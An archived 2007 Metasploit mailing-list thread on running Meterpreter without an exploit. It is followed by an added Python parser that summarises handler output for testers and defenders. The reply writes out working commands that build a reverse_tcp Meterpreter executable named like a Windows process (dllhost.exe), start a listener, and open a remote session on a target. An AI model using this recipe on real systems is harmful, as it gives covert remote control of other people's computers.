Metasploit mailing list archives

Meterpreter from a command line
From: chaines at gmail.com (Chuck Haines)
Date: Wed, 28 Feb 2007 09:41:46 -0500

Excellent.  I was so close it hurt as I almost had this done.

By the way, I've implemented a nice recursive search feature in the
meterpreter.  I should share the code, but it still has a few bugs and
could use some cleaning up.

--chuck

On 2/27/07, mmiller at hick.org <mmiller at hick.org> wrote:
Chuck,

Client-side support for stdapi has not been implemented in C.  However, you
should be able to accomplish what you're asking by using the payload handler
exploit.  This will use Metasploit's built-in support for stdapi in ruby, and
makes testing a whole lot easier.

Note: make sure you svn update; a recent change slightly changed the behavior
of the payload handler, which introduced some problems.

Here's how to go about this:

Step 1: Generate the executable that will act as the host for the meterpreter DLL.

This executable hosts the first stage of the payload (the reverse connect):

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.4.79.2 X > dllhost.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 177
Options: LHOST=10.4.79.2

Step 2: Start the payload handler

$ ./msfconsole

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ msf v3.0-beta-dev
+ -- --=[ 180 exploits - 104 payloads
+ -- --=[ 18 encoders - 5 nops
       =[ 31 aux

msf > use multi/handler
msf exploit(handler) > set LHOST 10.4.79.2
LHOST => 10.4.79.2
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...

Step 3: Run dllhost.exe on the target computer

After running dllhost.exe, you should see this from msfconsole:

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031)

meterpreter > idletime
User has been idle for: 8 secs
meterpreter >

Keep in mind that you can use the payload handler from msfcli too.

Hope that helps.

On Tue, Feb 27, 2007 at 01:16:21PM -0500, Chuck Haines wrote:
Hello all,
  I'm trying to write an example of using the meterpreter from the
command line.  What I want to do is have an exe that starts meterpreter
and connects back to another machine.  I have successfully written the
code that starts the meterpreter and connects back and it communicates
just fine.  However, when I try and load the stdapi, it tells me it
loads successfully, but doesn't actually give me the option of using
it.  Any help with this would be much appreciated.  I'm using the
metcli.exe that comes with the meterpreter to listen for a connection
and custom code to connect back to the metcli.exe and perform the init
on the metsrv.dll.
  In the previous release (2.7), I had to modify the metcli so it
knew about the stdapi (well, back then fs, net, etc.), but it seems that
the client portion of the stdapi no longer exists and there is only a
server portion.  Is that because it was never written or am I missing
something?  If someone could give a way to use msfconsole and have it
spawn a meterpreter reverse_tcp without having to do an exploit, that
would be the best.

Thanks,
Chuck

--
Chuck Haines
chaines at gmail.com
-----------------------------------------------------------
Tau Kappa Epsilon Fraternity
Fraternity For Life Alumni
http://www.tke.org
irc://irc.deepspace.org/TKE
-----------------------------------------------------------
Deepspace IRC NetAdmin
Providing Web Services for the Disabled
http://www.deepspace.org
irc://irc.deepspace.org/Lobby
-----------------------------------------------------------



-- 
Chuck Haines
chaines at gmail.com
-----------------------------------------------------------
Tau Kappa Epsilon Fraternity
Fraternity For Life Alumni
http://www.tke.org
irc://irc.deepspace.org/TKE
-----------------------------------------------------------
Deepspace IRC NetAdmin
Providing Web Services for the Disabled
http://www.deepspace.org
irc://irc.deepspace.org/Lobby
-----------------------------------------------------------
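The handler output quoted in mmiller's reply shows the full staging sequence as the listener sees it: an intermediate stager, the stage itself, the DLL upload, and finally the session line with both endpoints. The following parser is an added example, not code from Metasploit or from anyone on this thread; it turns those lines into a structured timeline (per-transfer byte counts, the listener and connecting endpoints) so a tester can drop the numbers straight into a report or correlate them with the byte counts a network sensor recorded for the same TCP connection. The sample log is constructed to match the output shown above; the regular expressions assume the `[*]` line formats quoted there and nothing else.

```python
"""Parse msfconsole multi/handler output into a staging timeline.

Added example (not Metasploit's own code). The regexes assume the
"[*] ... (N bytes)" and "[*] Meterpreter session N opened (...)" line
formats quoted in the thread.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: the handler output quoted in the reply, line for line.
SAMPLE_LOG = """\
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031)
"""


@dataclass
class StagingSummary:
    # (label, byte count) for every transfer the handler reported, in order
    stages: List[Tuple[str, int]] = field(default_factory=list)
    session_id: Optional[int] = None
    handler: Optional[Tuple[str, int]] = None  # listener (LHOST, LPORT)
    client: Optional[Tuple[str, int]] = None   # host that connected back

    @property
    def total_bytes(self) -> int:
        """Bytes the handler pushed over the reverse connection."""
        return sum(n for _, n in self.stages)


# "[*] <label>...(N bytes)" -- the label may be followed by an ellipsis.
_BYTES_RE = re.compile(r"^\[\*\]\s+(?P<label>.*?)\s*\.*\s*\((?P<n>\d+) bytes\)")
# "[*] Meterpreter session N opened (LHOST:LPORT -> RHOST:RPORT)"
_SESSION_RE = re.compile(
    r"^\[\*\]\s+Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lh>[\d.]+):(?P<lp>\d+) -> (?P<rh>[\d.]+):(?P<rp>\d+)\)"
)


def parse_handler_log(text: str) -> StagingSummary:
    """Walk the handler output and collect transfers plus the session tuple."""
    summary = StagingSummary()
    for line in text.splitlines():
        m = _SESSION_RE.match(line)
        if m:
            summary.session_id = int(m.group("sid"))
            summary.handler = (m.group("lh"), int(m.group("lp")))
            summary.client = (m.group("rh"), int(m.group("rp")))
            continue
        m = _BYTES_RE.match(line)
        if m:
            summary.stages.append((m.group("label"), int(m.group("n"))))
    return summary


def describe(summary: StagingSummary) -> List[str]:
    """Render the timeline as report lines (returned, not printed)."""
    lines = [f"{n:>6} bytes  {label}" for label, n in summary.stages]
    lines.append(f"{summary.total_bytes:>6} bytes  total pushed by handler")
    if summary.session_id is not None:
        lh, lp = summary.handler
        rh, rp = summary.client
        lines.append(f"session {summary.session_id}: {rh}:{rp} -> listener {lh}:{lp}")
    return lines


if __name__ == "__main__":
    for line in describe(parse_handler_log(SAMPLE_LOG)):
        print(line)
```

Run as-is it summarises the quoted session: three transfers (89, 2834 and 73739 bytes), 76662 bytes in total, with 10.4.79.102 connecting back to the listener on 10.4.79.2:4444. The byte counts are what makes the summary useful to a defender reviewing the same engagement: a short stager followed by a few-kilobyte stage and then a ~74 KB DLL on one connection is the pattern to look for in flow records for that listener port.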


